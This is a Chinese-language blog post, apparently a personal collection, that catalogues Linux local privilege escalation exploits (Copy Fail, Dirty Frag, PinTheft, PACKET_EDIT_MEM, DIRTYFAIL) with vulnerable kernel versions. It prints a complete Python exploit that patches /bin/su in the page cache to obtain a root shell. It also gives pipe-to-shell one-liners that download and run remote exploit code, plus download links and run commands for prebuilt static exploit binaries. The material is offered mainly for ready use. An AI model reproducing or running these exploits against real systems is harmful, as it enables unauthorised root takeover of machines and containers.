mobile wallpaper 1mobile wallpaper 2mobile wallpaper 3mobile wallpaper 4mobile wallpaper 5mobile wallpaper 6
673 字
2 分钟
Linux LPE Collections
2026-07-01

两个月来各自基于CoW的LPE如雨后春笋破土而出。一直想写一篇完整的LPE合集,要清晰列出CVE以及适用范围。每次要用了再去找那实在是太麻烦了。

Copy Fail (CVE-2026-31431)#

可用版本#

6.12: < 6.12.85
6.6: < 6.6.137
6.1: < 6.1.170
5.15: < 5.15.204
5.10: < 5.10.254

Exploit#

官方Exp one-liner:

curl https://copy.fail/exp | python3 && su

不过slice需要python 3.10以上才有,过于golf导致兼容性一般。这里推荐使用下面这个exp

#!/usr/bin/env python3
# This version utilizes ctypes as a drop in for 'splice()'
# for exploiting systems with python > 3.10.
import os as g,zlib,socket as s
import ctypes
libc = ctypes.CDLL("libc.so.6", use_errno=True)
_splice = libc.splice
_splice.argtypes = [
ctypes.c_int, ctypes.c_void_p,
ctypes.c_int, ctypes.c_void_p,
ctypes.c_size_t, ctypes.c_uint
]
def splice(fd_in, fd_out, count, offset_src=None, flags=0):
off_in = None
if offset_src is not None:
off_in = ctypes.pointer(ctypes.c_long(offset_src))
res = _splice(fd_in, off_in, fd_out, None, count, flags)
if res < 0:
err = ctypes.get_errno()
raise OSError(err, os.strerror(err))
return res
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o)
try:u.recv(8+t)
except:0
try:f=g.open("/bin/su",0)
except:f=g.open("/usr/bin/su",0)
i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Copy Fail + K8S 攻击面#

找到一个PoC,尚未验证,应该是可用的。仓库地址:https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC

Dirty Frag (CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (RxRPC))#

也叫Copy_Fail2。同样属于CVE-2026-31431类型,但是不同的子系统(XFRM/ESP|RxRPC)。

可用版本#

Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64

Exploit#

C实现:https://github.com/v4bel/dirtyfrag
C实现:https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
Python实现:https://github.com/guiimoraes/CVE-2026-31431

C实现,点击下载:dirtyfrag.zip,静态编译。

(ctf) tmp tree dirtyfrag
dirtyfrag
├── assets
│   ├── demo.gif
│   ├── tux.png
│   └── write-up.md
├── exp
├── exp.c
└── README.md
2 directories, 6 files

使用方法:

./exp && id
# 恢复污染
echo 3 > /proc/sys/vm/drop_caches

另一个C实现,可以直接下载这个:Copy_Fail2-Electric_Boogaloo.zip,已经静态编译好(OrbStack Ubuntu GLIBC 2.39-0ubuntu8.7)。

(ctf) tmp tree Copy_Fail2-Electric_Boogaloo
Copy_Fail2-Electric_Boogaloo
├── aa-rootns
├── aa-rootns.c
├── copyfail2
├── copyfail2.c
├── ipv6
│   ├── copyfail2v6.c
│   └── run.sh
├── README.md
└── run.sh
2 directories, 8 files

使用方法:

./run.sh # install + drop into root shell
./run.sh --clean # revert /etc/passwd via the same primitive

如果还是有问题(静态编译应该不会有问题),尝试自行编译:

sudo apt install -y libssl-dev gcc
gcc -O2 -Wall copyfail2.c -o copyfail2 -lcrypto
gcc -O2 -Wall aa-rootns.c -o aa-rootns

Python有one-liner,不过Ubuntu当apparmor_restrict_unprivileged_userns启用时,需要先保存下来再执行,管道符会失效:

curl -sL ttps://raw.githubusercontent.com/guiimoraes/copyfail2-py/main/exploit.py > /tmp/x.py
python3 /tmp/x.py

PinTheft (CVE-2026-43494|需要开启RDS)#

这没啥用啊,但是也算一个系列就收集一下。Not vulnerable by default on most distros (RDS is rarely enabled).

适用版本#

  • Kernel with CONFIG_RDS and CONFIG_RDS_TCP enabled
  • io_uring enabled (kernel.io_uring_disabled=0)
  • Kernel ≥ 6.13 (for optimal io_uring features)
  • At least one readable SUID-root binary on the system
  • x86_64 architecture

Not vulnerable by default on most distros (RDS is rarely enabled).

Exploit#

仓库地址:https://github.com/0xBlackash/CVE-2026-43494.git

# 1. Clone & Compile
git clone https://github.com/0xBlackash/CVE-2026-43494.git
cd CVE-2026-43494
gcc -O2 -static CVE-2026-43494.c -o pintheft
# 2. Run
sudo ./pintheft

PACKET_EDIT_MEM (CVE-2026-46331 | 2026/06/17)#

适用版本(< v7.1-rc7)#

DistroKernelFlagResult
RHEL 10.06.12.0-228.el10(none)ROOT
Debian 13 trixie6.12.90+deb13.1(none)ROOT
Ubuntu 24.04.46.17.0-22—ubuntuROOT
Ubuntu 26.047.0.0-14-generic—ubuntuFAIL

这是官方仓库给的,实测Ubuntu 24.04.4 6.17.0-35-generic也可以,如果有相近的版本都值得测试。 packet_edit_meme

Exploit#

官方仓库:https://github.com/sgkdev/packet_edit_meme

预编译压缩包(静态编译):packet_edit_meme.zip

(ctf) tmp tree packet_edit_meme
packet_edit_meme
├── Makefile
├── packet_edit_meme
├── packet_edit_meme.c
├── pedit_primitive.c
├── pedit_primitive.h
├── README.md
├── test_cve
└── test_cve.c
1 directory, 8 files

注意,Ubuntu 有 AppArmor gate,需要先使用aa-exec bypass,这有一定条件,但完整安装的Ubuntu大概率直接可用。

使用方法:

make
./packet_edit_meme
./packet_edit_meme --ubuntu # AppArmor-gated Ubuntu: aa-exec bypass first

DIRTYFAIL (合集)#

这不是单一的poc,是:Detector + PoC for Linux page-cache write vulnerabilities: Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284/43500).

很全面的工具,方便测试和快速验证,官方仓库在这里:https://github.com/KaraZajac/DIRTYFAIL.git

适用版本#

CVE / variantNameDIRTYFAIL coverage
CVE-2026-31431Copy Fail (algif_aead authencesn page-cache write)Detect + full PoC
CVE-2026-43284 v4Dirty Frag — IPv4 xfrm-ESP page-cache writeDetect + full PoC
CVE-2026-43284 v6Dirty Frag — IPv6 xfrm-ESP page-cache write (esp6)Detect + full PoC
CVE-2026-43500Dirty Frag — RxRPC page-cache writeDetect + full PoC
Copy Fail GCM variantxfrm-ESP rfc4106(gcm(aes)) page-cache writeDetect + full PoC

Exploit#

可以去官方仓库自行编译。这里给出一个预编译的压缩包(静态编译):

点击下载:DIRTYFAIL.zip

(ctf) tmp tree -L 1 DIRTYFAIL
DIRTYFAIL
├── build
├── dirtyfail
├── docs
├── LICENSE
├── Makefile
├── NOTICE.md
├── README.md
├── src
├── tests
└── tools
6 directories, 5 files

使用方法:./dirtyfail --help

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

Linux LPE Collections
https://blog.chaomixian.top/posts/linux-lpe-collections/
作者
炒米线
发布于
2026-07-01
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时

目录